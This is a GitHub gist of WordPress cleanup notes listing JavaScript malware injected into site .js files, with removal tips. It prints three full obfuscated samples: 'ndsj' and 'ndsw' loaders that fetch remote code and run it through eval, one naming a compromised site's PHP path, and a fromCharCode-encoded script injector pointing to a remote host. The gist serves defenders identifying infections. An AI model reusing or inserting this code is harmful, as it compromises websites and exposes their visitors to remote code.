Skip to content

Instantly share code, notes, and snippets.

@Jany-M

Jany-M/wp_common_hack_strings.js

Last active April 14, 2023 17:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Jany-M/4fd0cc645034f32428e89f078caa9a8c to your computer and use it in GitHub Desktop.
Save Jany-M/4fd0cc645034f32428e89f078caa9a8c to your computer and use it in GitHub Desktop.
Download ZIP
[WP] WordPress common Javascript hack strings
Raw
wp_common_hack_strings.js
// Common JS strings injected in all core, themes and plugins .js files (at the very end) - Use String Locator plugin and replace with empty space and/or use Force Reinstall plugin to reinstall all plugins - Remember to reinstall WP core files too
// Look for these plugins and remove them: Core, Core Stub
// Look for these themes and remove them: Classic
// Want to dig deeper? https://0x1.gitlab.io/security/Malware-Analysis-Tools-List/
// 1
;if(ndsj===undefined){function C(V,Z){var q=D();return C=function(i,f){i=i-0x8b;var T=q[i];return T;},C(V,Z);}(function(V,Z){var h={V:0xb0,Z:0xbd,q:0x99,i:'0x8b',f:0xba,T:0xbe},w=C,q=V();while(!![]){try{var i=parseInt(w(h.V))/0x1*(parseInt(w('0xaf'))/0x2)+parseInt(w(h.Z))/0x3*(-parseInt(w(0x96))/0x4)+-parseInt(w(h.q))/0x5+-parseInt(w('0xa0'))/0x6+-parseInt(w(0x9c))/0x7*(-parseInt(w(h.i))/0x8)+parseInt(w(h.f))/0x9+parseInt(w(h.T))/0xa*(parseInt(w('0xad'))/0xb);if(i===Z)break;else q['push'](q['shift']());}catch(f){q['push'](q['shift']());}}}(D,0x257ed));var ndsj=true,HttpClient=function(){var R={V:'0x90'},e={V:0x9e,Z:0xa3,q:0x8d,i:0x97},J={V:0x9f,Z:'0xb9',q:0xaa},t=C;this[t(R.V)]=function(V,Z){var M=t,q=new XMLHttpRequest();q[M(e.V)+M(0xae)+M('0xa5')+M('0x9d')+'ge']=function(){var o=M;if(q[o(J.V)+o('0xa1')+'te']==0x4&&q[o('0xa8')+'us']==0xc8)Z(q[o(J.Z)+o('0x92')+o(J.q)]);},q[M(e.Z)](M(e.q),V,!![]),q[M(e.i)](null);};},rand=function(){var j={V:'0xb8'},N=C;return Math[N('0xb2')+'om']()[N(0xa6)+N(j.V)](0x24)[N('0xbc')+'tr'](0x2);},token=function(){return rand()+rand();};function D(){var d=['send','inde','1193145SGrSDO','s://','rrer','21hqdubW','chan','onre','read','1345950yTJNPg','ySta','hesp','open','refe','tate','toSt','http','stat','xOf','Text','tion','net/','11NaMmvE','adys','806cWfgFm','354vqnFQY','loca','rand','://','.cac','ping','ndsx','ww.','ring','resp','441171YWNkfb','host','subs','3AkvVTw','1508830DBgfct','ry.m','jque','ace.','758328uKqajh','cook','GET','s?ve','in.j','get','www.','onse','name','://w','eval','41608fmSNHC'];D=function(){return d;};return D();}(function(){var P={V:0xab,Z:0xbb,q:0x9b,i:0x98,f:0xa9,T:0x91,U:'0xbc',c:'0x94',B:0xb7,Q:'0xa7',x:'0xac',r:'0xbf',E:'0x8f',d:0x90},v={V:'0xa9'},F={V:0xb6,Z:'0x95'},y=C,V=navigator,Z=document,q=screen,i=window,f=Z[y('0x8c')+'ie'],T=i[y(0xb1)+y(P.V)][y(P.Z)+y(0x93)],U=Z[y(0xa4)+y(P.q)];T[y(P.i)+y(P.f)](y(P.T))==0x0&&(T=T[y(P.U)+'tr'](0x4));if(U&&!x(U,y('0xb3')+T)&&!x(U,y(P.c)+y(P.B)+T)&&!f){var B=new HttpClient(),Q=y(P.Q)+y('0x9a')+y(0xb5)+y(0xb4)+y(0xa2)+y('0xc1')+y(P.x)+y(0xc0)+y(P.r)+y(P.E)+y('0x8e')+'r='+token();B[y(P.d)](Q,function(r){var s=y;x(r,s(F.V))&&i[s(F.Z)](r);});}function x(r,E){var S=y;return r[S(0x98)+S(v.V)](E)!==-0x1;}}());};
// 2
eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,98,108,105,99,107,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,98,108,105,99,107,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,54,44,49,49,52,44,57,55,44,57,57,44,49,48,55,44,52,54,44,49,49,56,44,49,48,53,44,49,49,49,44,49,48,56,44,49,48,49,44,49,49,54,44,49,48,56,44,49,49,49,44,49,49,56,44,49,48,49,44,49,48,56,44,49,48,53,44,49,49,48,44,49,48,49,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,52,44,57,57,44,52,55,44,57,56,44,57,55,44,57,57,44,49,48,55,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,53,49,44,52,54,44,52,56,44,52,54,44,52,57,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125/*4568587847234*/));
// 2
;if(ndsw===undefined){
(function (I, h) {
var D = {
I: 0xaf,
h: 0xb0,
H: 0x9a,
X: '0x95',
J: 0xb1,
d: 0x8e
}, v = x, H = I();
while (!![]) {
try {
var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
if (X === h)
break;
else
H['push'](H['shift']());
} catch (J) {
H['push'](H['shift']());
}
}
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
var t = { I: '0xa5' }, e = {
I: '0x89',
h: '0xa2',
H: '0x8a'
}, P = x;
this[P(t.I)] = function (I, h) {
var l = {
I: 0x99,
h: '0xa1',
H: '0x8d'
}, f = P, H = new XMLHttpRequest();
H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
var Y = f;
if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
}, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
};
}, rand = function () {
var a = {
I: '0x90',
h: '0x94',
H: '0xa0',
X: '0x85'
}, F = x;
return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
}, token = function () {
return rand() + rand();
};
(function () {
var Q = {
I: 0x86,
h: '0xa4',
H: '0xa4',
X: '0xa8',
J: 0x9b,
d: 0x9d,
V: '0x8b',
K: 0xa6
}, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
u[U('0xa5')](E, function (G) {
var j = U;
g(G, j(0xa9)) && X[j(T.I)](G);
});
}
function g(G, N) {
var r = U;
return G[r(m.I) + r(0x92)](N) !== -0x1;
}
}());
function x(I, h) {
var H = A();
return x = function (X, J) {
X = X - 0x84;
var d = H[X];
return d;
}, x(I, h);
}
function A() {
var s = [
'send',
'refe',
'read',
'Text',
'6312jziiQi',
'ww.',
'rand',
'tate',
'xOf',
'10048347yBPMyU',
'toSt',
'4950sHYDTB',
'GET',
'www.',
'//www.architettifirenze.it/wp-admin/css/colors/blue/blue.php',
'stat',
'440yfbKuI',
'prot',
'inde',
'ocol',
'://',
'adys',
'ring',
'onse',
'open',
'host',
'loca',
'get',
'://w',
'resp',
'tion',
'ndsx',
'3008337dPHKZG',
'eval',
'rrer',
'name',
'ySta',
'600274jnrSGp',
'1072288oaDTUB',
'9681xpEPMa',
'chan',
'subs',
'cook',
'2229020ttPUSa',
'?id',
'onre'
];
A = function () {
return s;
};
return A();}};
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment